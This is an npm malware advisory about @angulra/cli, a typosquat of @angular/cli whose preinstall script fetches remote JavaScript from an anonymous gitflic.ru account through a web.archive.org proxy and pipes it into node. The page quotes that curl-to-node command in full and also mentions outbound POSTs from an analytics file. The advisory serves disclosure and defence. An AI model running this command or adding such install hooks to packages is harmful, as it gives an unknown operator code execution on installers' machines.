@angulra/cli@22.2.1
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC
OSV ID
MAL-2026-17495
Ecosystem
npm
Summary
The package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on npm install, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.
Source: amazon-inspector (e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.